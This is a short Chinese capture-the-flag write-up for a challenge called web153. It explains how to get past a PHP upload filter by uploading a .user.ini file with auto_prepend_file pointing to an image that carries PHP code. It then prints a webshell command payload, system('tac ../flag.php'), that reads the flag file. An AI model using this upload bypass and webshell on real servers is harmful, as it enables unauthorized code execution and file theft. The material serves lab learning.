web153笔记(后端不能单⼀校验,后端校验要严密+过滤php+.user.ini文件包含)
这⼀次再传php就拦截下来了,这⾥开始可以⽤ .user.ini 来构造后⻔
php.ini是php的⼀个全局配置⽂件,对整个web服务起作⽤;⽽.user.ini和.htaccess⼀样是⽬录的配置⽂件,.user.ini就是⽤户⾃定义的⼀个php.ini,我们可以利⽤这个⽂件来构造后⻔和隐藏后⻔。.htaccess是Apache的,.user.ini是Nginx的
auto_prepend_file=filename //包含在⽂件头
auto_append_file=filename //包含在⽂件尾
这⾥传⼀个.user.ini
⾥⾯内容写auto_prepend_file=mm.png (先上传图片然后BP改)
然后上传⼀个png图⽚,包含⽊⻢
然后利⽤⽂件包含getshell
POST:mm=system('tac ../flag.php');
//.user.ini
auto_prepend_file=1.png
//1.png
<?php phpinfo();?>
//1.php(任意php文件)访问触发,因为已经有index.php,此处直接访问
满足这三个文件在同一目录下,则相当于在1.php文件里插入了包含语句require('1.png'),进行了文件包含,所以我们就依次上传即可。
浙公网安备 33010602011771号